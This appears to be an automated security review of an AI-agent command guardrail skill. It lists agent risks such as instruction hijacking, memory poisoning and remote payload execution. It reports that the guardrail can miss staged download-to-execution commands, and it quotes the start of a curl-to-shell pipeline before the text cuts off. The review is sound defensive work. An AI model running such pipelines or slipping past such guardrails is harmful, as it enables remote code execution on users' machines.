DeepInspect Guardrails

Security checks for vulnerabilities and agentic risk

Overview

This looks like a coherent command-risk guardrail, but it can incorrectly allow staged remote-code execution patterns despite presenting itself as a preflight decision tool.

Review before installing or relying on this skill. It is not malicious from the inspected artifacts, but it should not be used as the sole enforcement gate for command execution unless the default policy, shell parsing, and staged download-to-execution detection are strengthened.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally

Remote Payload Execution Bypass Through Incomplete Command Classification

It detects direct download-to-shell pipelines such as: ```bash curl https://example.invalid/ ...[truncated 2773 chars]

Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).
